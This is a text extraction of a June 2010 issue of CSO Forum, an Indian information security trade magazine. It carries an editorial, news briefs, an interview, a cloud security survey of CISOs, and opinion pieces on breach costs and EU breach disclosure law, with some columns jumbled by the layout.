Security For Growth And Governance
June | 21 | 2010 Volume 01 | Issue 03
SECURITY REPORT The CS0 FORUM CLOUD SECURITY SURVEY 2010 looks into user confidence levels and concerns of CISOs across the region. PAGE 05
IN-SHORT
Code Security
Best Practices PAGE 02
IN-PERSON
Protect Infosec
Assets, Always
PAGE 04
A 9.9 Media Publication
OPINION
Cost of
Insecurity PAGE 07
IN-DEPTH
EDITORIAL
ANURADHA DAS MATHUR | editor@csoforum.in
Walking securely in the Cloud... will CISOs lead the way? A
t the recently concluded CSO Forum’s Advisory Council meeting, I was pleasantly surprised. Contrary to popular perceptions, India’s leading CISOs sounded completely convinced of the need to move to the cloud. The economics of it is compelling and the focus, in their minds, is to ensure a safe and secure migration – as opposed to a ‘whether or not’ decision. This is in sharp contrast to 18 months ago, when at similar forums, the paranoia around the security of the cloud was overwhelming enough to dwarf the economics! Cloud service providers still seem to be focusing on the CFO community to get their buy-in. It seems to me that they must start from the belief that the economic advantages of moving to the cloud are evident and therefore the issue is to demonstrate a secure migration together with water-tight legalities. Post the decision to migrate – the key concern is still very much around security and compliance. This means co-opting the CISO and the legal heads of enterprises as opposed to just the CFO. Beyond the broad ‘whether or not debate’ is a slew of questions around which type of cloud—public, private, hybrid or community. Each has different implications for security and costs. And organisations need to make their choices based on their specific needs—there is no ‘one size fits all’ answer. Their decision is equally guided by the quality and the competence of the cloud service provider. The CISO community predicts vast improvements in the offerings of cloud vendors in the foreseeable future. While business savvy CISOs believe they must demonstrate the RoI for security investments, there are many who are comfortable trading off some costs for greater security – for instance by choosing a private cloud. And to their advantage, currently the security mindset is such that they are likely to be heard... As I said, decision-making is coming of age—where corporate functions are aligned to derive maximum business benefit without risking the enterprise unduly... in terms of the cloud, CISOs have their place under the sun! We are embarking on further research relating to the security of the cloud and I will keep you posted. In the meantime, please do share your thoughts and feedback... Stay safe.
VOLUME 01 | ISSUE 03 | 21 JUNE 2010 Managing Director: Dr Pramath Raj Sinha Printer & Publisher: Kanak Ghosh Publishing Director: Anuradha Das Mathur EDITORIAL Editor-in-chief: Rahul Neel Mani Editor (Online): Geetaj Channana Associate Editor: Dominic K Resident Editor (West & South): Ashwani Mishra Assistant Editor: Aditya Kelekar Principal Correspondent: Vinita Gupta Correspondent: Sana Khan DESIGN Sr. Creative Director: Jayan K Narayanan Art Director: Binesh Sreedharan Associate Art Director: Anil VK Manager Design: Chander Shekhar Sr. Visualisers: PC Anoop, Santosh Kushwaha Sr. Designers: Prasanth TR, Anil T & Suresh Kumar Designer: Sristi Maurya Chief Photographer: Subhojit Paul Photographer: Jiten Gandhi ADVISORY BOARD Arup Chatterjee, CISO, WNS Global Services (P) Ltd Burgess Cooper, Head, IT Security, Vodafone Essar Limited Felix Mohan, CISO, Bharti Airtel Limited Japjit S Sandhu, VP & Head IT, VFS Global KR Krishnakumar, Group CISO, Aditya Birla Group Murli Nambiar, VP, Information Security, Reliance Capital Pradeep Sekar, Senior VP & Head IS, Citi India, Srilanka & Bangladesh Prof. Ponnurangam, Professor IIITD Raghu Raman, CEO, National Intelligence Grid Satish Warrier, Associate VP, IS, Godrej Industries Sunil Dhaka, CISO, ICICI Bank Ltd. Vishal Salvi, Senior VP & CISO, HDFC Bank SALES & MARKETING VP Sales & Marketing: Naveen Chand Singh National Manager-Events and Special Projects: Mahantesh Godi (09880436623) Product Manager: Rachit Kinger Asst. Brand Manager: Arpita Ganguli GM South: Vinodh K (09740714817) Senior Manager Sales (South): Ashish Kumar Singh GM North: Lalit Arun (09582262959) GM West: Sachin Mhashilkar (09920348755) Kolkata: Jayanta Bhattacharya (09331829284) PRODUCTION & LOGISTICS Sr. GM. Operations: Shivshankar M Hiremath Production Executive: Vilas Mhatre Logistics: MP Singh, Mohd. Ansari, Shashi Shekhar Singh OFFICE ADDRESS Nine Dot Nine Interactive Pvt Ltd C/o K.P.T House,Plot 41/13, Sector-30, Vashi, Navi Mumbai-400703 India Printed and published by Kanak Ghosh for Nine Dot Nine Interactive Pvt Ltd C/o K.P.T House, Plot 41/13, Sector-30, Vashi, Navi Mumbai-400703 India Editor: Anuradha Das Mathur C/o K.P.T House, Plot 41/13, Sector-30, Vashi, Navi Mumbai-400703 India Printed at Silverpoint Press Pvt. Ltd. D 107,TTC Industrial Area, Nerul.Navi Mumbai 400 706
CSO FORUM 21 JUNE 2010
1
IN-SHORT 178 Arrested in Card Fraud Raids
I
Code Security
SAFECode report highlights best practices A NEW report from the Software Assurance Forum on the responsibilities and expectations of vendors and suppliers. "The written agreement for Excellence in Code (SAFECode) sheds new light must explicitly state the expectations as well as on how vendors are trying to work more secure the consequences of any non-compliance with coding into the product development process. the terms of the agreement," the report said. The vendors contributing to the report are SAFEVendor technical integrity controls for suppliers Code members who have enjoyed some success that address everything from secure transfer of in reducing the frequency of attacks against its code, sharing of system and network resources, technology, including EMC Corp., Juniper Netmalware scanning and secure storage. More works, SAP and Microsoft. But the organisation rigorous security testing with static code analysis also includes companies that continue to have an tools, network and web application vulnerability uphill climb, most notably Adobe Systems. scanners, binary code analysis tools, malware Despite its efforts to write more ironclad softdetection tools that can discover such problems ware, Adobe has taken heavy criticism for the as backdoor holes; and security compliance number of vulnerabilities attackers have been able validation tools. The code security to exploit. trend is reflected in the Rugged software SAFECode's latest paper deals movement; specifically with this area and represents BSIMM, the Building Security In the first industry-led effort to identify and Maturity Model; analyse the software integrity controls used Microsoft's Security Development by software vendors to protect software from the insertion of vulnerabilities as it Market share Lifecycle (SDL); the growth of OWASP, the Open Web moves along the global supply chain, he for internet added. Among the actions worth pursuing explorer, the Application Security Project; and the emergence of new secure to improve security in the supply chain, lowest in a application development certifications SAFECode members recommend: Vendor decade. such as the CSSLP from ISC2. contracts that include stronger language
DATA BRIEFING
PHOTO BY PHOTOS.COM
52.95%
2
CSO FORUM 21 JUNE 2010
n what is being called one of the largest credit card fraud ring busts to date, the Spanish Interior Ministry says police in 12 countries have arrested 178 people suspected of being part of an international crime gang. According to a statement from the Spanish ministry, these arrests resulted from a two-year investigation and included raids in France, Italy, Germany, Ireland, Romania, Australia, Sweden, Greece, Finland, Hungary and the United States, where eight of the suspects were arrested. Police say this alleged gang was involved in credit card fraud, robbery with violence, extortion, sexual exploitation and money laundering. The group is believed to have made more than $24.5 million from its illegal activities. During their raids, police found 11 laboratories for falsifying credit cards, as well as more than 120,000 stolen credit cards and 5,000 cloned cards. These 178 arrests are significant. The 120,000 stolen cards are significant. These are not the kids who are on YouTube selling card skimmers; this was a group with lots of people involved to accumulate card data."
IN-SHORT
10 R&D Cyber Security initiatives US Congress seeks 6
1
2
3 4 5
Understand human behavioral factors that can affect cybersecurity technology and practices; Test, evaluate and facilitate, with appropriate protections for any proprietary information concerning the technologies, the transfer of technologies associated with the engineering of less vulnerable software and securing the information technology software development lifecycle; Assist the development of identity management and attribution technologies; Assist the development of technologies designed to increase the security and resiliency of telecommunications networks; and Advance the protection of privacy and civil liberties in cybersecurity technology and practices. The legislation also would provide for governmentbacked R&D to address other risks identified by the director of the National Center for Cybersecurity and Communications, the Department of Homeland Security unit that would be created by the Senate legislation to oversee federal cybersecurity programs among civilian agencies and departments.
7
8
9
10
HACKED: iPad 3G Owners’ e-mail Addresses Compromised PROMINENT users of Apple's new iPad 3G, including military and government officials as well as media personalities and celebrities, were among those that had their e-mail addresses hacked by a group that shared its findings with online publication Valleywag to point out security flaws in AT&T's Web servers. The iPad 3G went on sale April 30 in the United States. It uses either Wi-Fi or AT&T's 3G cellular service to connect to the Internet for Web surfing and e-mail. A Wi-Fi only iPad was offered first, in early April. So far, Apple has sold more than 2 million iPads, the company has said. There was no comment from Apple, which earlier this week introduced its next-generation iPhone. Apple wasn't the first to show the new iPhone; gadgets blog Gizmodo was a few months ago when it purchased an iPhone prototype for $5,000. Gizmodo is owned by Gawker Media, the same company that pub-
lishes Valleywag. The ICC IDS (integrated circuit card identifier) is a unique identifier tying a device to a wireless subscriber. The company said it is "continuing to investigate and will inform all customers whose e-mail addresses and ICC IDS may have been obtained. The group that hacked AT&T's Web servers is called Goatse, which has "previously highlighted real security vulnerabilities in the Firefox and Safari Web browsers, and attracted media attention for finding what it said were flaws in Amazon's community ratings system," Gawker said. The least expensive iPad 3G model costs between $629; the most expensive, $829. AT&T does not require a contract for iPad customers to use its cellular network. For new iPad customers, AT&T's $25, 2-gigabytes-a-month plan replaces the existing $29.99-a-month unlimited plan. There is also a $15 monthly plan for those who use up to 250 megabytes of data.
CSO FORUM 21 JUNE 2010
3
ILLUSTRATION BY PHOTOS.COM
A CYBER SECURITY bill introduced in the Senate last week lists key research and development initiatives the government would back in its quest to secure critical information systems and networks. The Protecting Cyberspace as a National Asset Act of 2010, as the Senate measure is known, lists 10 R&D initiatives: Advance the development and accelerate the deployment of more secure versions of fundamental Internet protocols and architectures, including for the secure domain name addressing system and routing security; Improve and create technologies for detecting and analysing attacks or intrusions, including analysis of malicious software; Improve and create mitigation and recovery methodologies, including techniques for containment of attacks and development of resilient networks and systems; Develop and support infrastructure and tools to support cybersecurity research and development efforts, including modeling, testbeds, and data sets for assessment of new cybersecurity technologies; Assist the development and support of technologies to reduce vulnerabilities in process control systems;
IN-PERSON
BY PATRICIA TITUS
Chief Information Security Officer, Unisys Federal
working with the Indian government, much of the critical infrastructure such as airports is government-owned. So it should be easier for the Indian government to collect data on critical assets than it is in America. Brief us on the trends you observed in the past few years. What should CISOs do? The threats continue to become more sophisticated and blended in nature. But I also would like to note that many organisations are ignoring some of the most basic security protections. Patch management, anti-virus definitions and other basic security hygiene is being overlooked or simply not done. Conficker is a great example of a very old exploit coming back into the security picture because people ignored it. CISOs need to continue to be diligent with the basics first.
“Security must be placed in the right part of the organisation or it will fail to get traction.’’
Protect Infosec Assets, Always Patricia Titus, Chief Information Security Officer, Unisys Federal, spoke to Dominic K on issues related to the protection of critical infrastructure assests of an enterprise. What is the state of critical infrastructure protection programmes in the United States and how, according to you, should India address the same? Critical infrastructure programmes in the U.S. are beginning to get more attention when it comes to cyber security protections. While there’s still a lot of work to be done, many organisations have begun the arduous task of implementing a risk management programme based on the IT systems. The U.S. Department of Homeland Security has taken steps to start identifying what
4
CSO FORUM 21 JUNE 2010
should be deemed as a critical asset. Since the inception of the programme, the list of critical assets in the National Asset Database is expected to grow exponentially as and when data is collected. Now that the department has identified the assets, the next step is to prioritise them based on criticality factors outlined in the process documentation. I strongly recommend that India begins to take steps such as this to assist in identifying and prioritising critical assets and performing the necessary risk management tasks. From what I recall from my days in India
What do you foresee in the coming years considering that threats are blended and getting more complex by every passing day? The consumerisation of IT and the demands for access to data that accompany that trend mean that we’ll continue to see the movement of data to the cloud and to mobile devices. This move will mean security professionals will need to think differently about data protection. Perimeter security on its own will no longer be enough. Security professionals need to identify data types and apply security controls based on data types rather than attempt to protect all of their data in the same way. This will allow a more focused approach to the most critical data types. What is your experience on cyber war and how has United States addresses the same? I strongly believe that there needs to be more international dialogue on what constitutes a cyber war and the associated rules of behaviour. Much the same as the Geneva Convention, we need a convention for cyber war.
COVER STORY
SECURITY REPORT Information security requires clear assesment of risks, decisionmaking behaviors and metrics for evaluating business and policy options. The CSO Forum ran a nation wide cloud security survey. Excerpts. By Dominic K
CSO FORUM 21 JUNE 2010
5
IMAGING: SANTOSH KUSHWAHA
A
cross nations cloud computing is a ubiquitous and growing set of extremely efficient, massively scalable multi-tenant data centres offering enterprises an alternative way of building, deploying and selling services at a significantly lower price point. Customers have the options to pay for these services on a pay as you go, usage based model that ramps as you grow. Key factors leading to low cost cloud computing can be attributed to Significant advances in data centre management automation. Better utilisation of resources through system virtualisation (for servers, network, and security) Greatly increased data centre density due to multi-core chips and blades. Continual reduction in Internet latency and bandwidth costs has changed the feasibility of using remote system.
COVER STORY
Figure 4:
Figure 3:
Top three business concerns
Top three technology concerns
Size of company
Hacker/data breach
Financial stability
Loss of data due to system failure
Lack of process within the company
Business Continuity/Disaster Recovery
Lack of segregation of duties
Interruption of availability
Lack of security personnel
Data integrity tampering
No risk management process
70 60 50 40 30 20 10 0
86 84 82 80 78 76 74 72
Rating Score
Lack of transparency
Rating Score
Technology Concerns
Figure 5:
Top three legal concerns
Business Concerns
Ownership of data Terms of service Lack of enforceable remedies from a breach
ownership of data (50%) followed by issues related to terms of service, a lack of enforceable remedies and compliance, all three tied at the second place (30%)(Fig 5). The top three compliance concerns are those related to financial regulations (backed by 53% respondents) followed by industry specific regulations (52% say so) and compliance with international regulations (claimed by 51 % of respondents).
Compliance with industry specific privacy regulations Discovery issues Exposure of seizure of data by government etc. Cross-country data flow
Rating Score
The CSO Forum conducted a nation wide survey on the state of cloud security across verticals and sectors. 100 key Chief Information Security Officers (CISOs) and Chief Information Officers (CIOs) who held additional responsibilities of enterprise security in their respective organisations participated. The results were interesting to analyse in view of the active participation from the government. Many public sector enterprises also responded to the survey. The key findings are mentioned below. According to the CSO Forum state of enterprise cloud security survey 2010, 55 percent of the respondents are planning to adopt and migrate to one or more cloud computing application for their enterprise application. The remaining 45 percent of the CISOs are yet to take a decision on the same (Fig.1). The survey clearly pointed out that most of the employees (64%) accessed cloud based services only after proper authorisation (Fig2). Figure 3 mentions the top three business concerns according to our survey in descending order. They are financial stability (84% respondents feel so), lack of transparency and lack of security professionals (jointly at 82 %) and size of the company (at 80%). Technology issues hounding the information security chief are data integrity tampering (felt by 60 %) followed by data breach / penetration by black hats (at 56%). The next most important concern is loss of data due to system failure (at 55%). (Fig 4) The top three legal concerns included
70 60 50 40 30 20 10 0
Legal Concerns
Figure 6:
Top three compliance concerns Figure 2:
Do you plan to adopt one or more cloud computing applications within your organisation in the next twelve months?
45%
Yes
55%
No
Industry specific regulations (HIPAA, PCI, etc)
Did employees begin using cloud based services without proper authorisation
64%
36%
Yes No
Financial regulations (Sarbanes Oxley, etc) Compliance with international regulations over numerous countries
Rating Score
Figure 1:
53.5 53 52.5 52 51.5 51 50.5 50 Compliance Concerns
6
CSO FORUM 21 JUNE 2010
OPINION BY DOMINIC K dominic.k@9dot9.in
THE AUTHOR IS Associate Editor, CSO Forum
The Cost of Being Insecure GLOBALLY, WHAT do you think the average cost of a data breach is? Guess. Ponemon Institute did some research and they found that it is a staggering 3.43 million USD. This kind of money is just scary. United States and Germany have laws that makes it even harder for malicious hackers and social engineers to do their dirty deeds, yet in both those countries the average costs were higher. Not a small amount either, in Germany is was over 25 percent higher and 43percent in USA - higher than the global average! There is a mountain of information available on how to protect, how to choose a penetration tester, how to stay protected from hacking attacks, social engineering attacks and even virus attacks. In addition, there are new laws to help protect. Even then, this number continuously increases each year. Why so? One of the reasons we feel this is happening is the lack of good education on security. It seems that now-a-days anyone that takes a week long boot camp, and then appears for a certification exam can become a penetration tester. Unleashing this type of pentester on production servers can cause more harm than good. In one of my recent interactions with Richard Stienon he discussed
what inspired him to write on surviving Cyber War. He mentioned that sometime in 2007, post the attacks on Estonia's Internet network, he realised that the hierarchy was actually a timeline. He started to research state-sponsored attacks looking for examples that would meet the criteria for cyber warfare: the combination of network attacks with tanks rolling across borders. On August 8, 2008, Russia sent tanks across the border into South Ossetia while there were simultaneous attacks on Georgian networks. That’s when he decided to write a book on surviving cyber war. He picked narrative non-fiction because he had already written over 3,00,000 words on threat chaos and hence wanted to write a book that would have a broad appeal. He also decided not to water down the technical aspects. In his own words - "I would not shy away from technical concepts but would explain them in a way that any regular reader of the New York Times, Wall Street Journal, or any blog could pick up." He also sought to tell the stories of the people involved in conducting cyber research and defence. The hardest part about writing any book on cyber threats is that they do not stop while you are writing. The infiltration of
Militaries around the world are re-organising around cyber-units and policy makers are engaging in international summits to discuss the threats.
the Dalai Lama's network (GhostNet), the DDoS attacks on US and South Korean websites of last summer, the USB thumb drive infection in the US and Indian military... all thsese had to be incorporated as they happened. One month after submitting the manuscript, Google made their announcement that Chinese hackers had targeted their sourcecode and Chinese users. Richard accepted that his biggest worry as he wrote was that an accomplished journalist from the NYT or FT would also attempt to write essentially the same theme book. Thankfully that did not happen. Militaries around the world are re-organising around cyber-units, policy makers are engaging in international summits to discuss the threats and what to do about them. The US Congress is contemplating over 40 separate bills addressing cyber security issues. This is a clear indication for Indian government and enterprises across verticals and sectors to be proactive. This includes framing and streamlining strict processes and legal guidelines on information security breaches so as to help avoid the colossal cost of being insecure by avoiding incidents.
CSO FORUM 21 JUNE 2010
7
OPINION FRANCOISE GILBERT
THE AUTHOR IS Managing Director at IT Law Group and author of Global Privacy & Security Law Treatise
Coming Soon to European Union: Security Breach Disclosure Requirements A SIGNIFICANT change to the data protection regime in the European Union is in progress. Within the next twelve months, the data protection laws of the Member States of the European Union will be modified to require companies that are subject to the ePrivacy Directive 2002/136/EC to disclose the occurrence of a breach of security to the appropriate authority, and to the individuals whose personal data are affected by the breach of security. This change will have a significant effect on the Indian companies that do business with EU based companies that are subject to Directive 2002/136/EC. They should start preparing now for the time when a recent amendment to this Directive is implemented in the national laws throughout the European Union. This amendment to the EU national laws will cause certain categories of EU companies to require amendments to their existing contracts and to demand that their Indian service providers accommodate this new requirement for disclosure of the breach of security. While new security breach disclosure regime affects only providers of a publicly available electronic communication services, it is likely
8
CSO FORUM 21 JUNE 2010
that it will be the foundation for defining a security breach disclosure framework that applies to other personal data holders. The amendments must be implemented in each of the national laws of the Member States of the European Union and the European Economic Area by June 2011. The new Article 4(1a) directs that the security measures must: Ensure that personal data can be accessed only by authorised personnel for legally authorised purposes; Protect personal data stored or transmitted against accidental or unlawful destruction, accidental loss or alteration, and unauthorised or unlawful storage, processing, access or disclosure, and; Ensure the implementation of a security policy with respect to the processing of personal data. In addition, the 2009 Amendment grants the relevant national authorities the ability to audit the measures taken by providers of publicly available electronic communication services and to issue recommendations about best practices concerning the level of security that these measures should achieve. The concept of disclosure of a
Security breach disclosure regime affects providers of a publicly available electronic communication services.
breach of security already existed in the 2002 version of the e-Privacy Directive. Under Article 4(2) of the ePrivacy Directive, Member States' national laws must require providers of publicly available electronic communications services to inform subscribers of any special risks of a breach of the security of the network. Such risks may occur for electronic communications services over an open network such as the Internet or analog mobile telephony. Indian companies that do business with European Union companies that are subject to the ePrivacy Directive 2002/136/EC should start preparing for the time when the 2009 Amendment to the Directive are implemented in the national laws of the EU Member States. These clients will promptly require the amendments of their existing contracts to require the Indian service providers to accommodate the requirement for disclosure of the breach of security. These additional obligations will likely create significant additional costs and legal liability. It is important to prepare a budget for these costs ahead of time.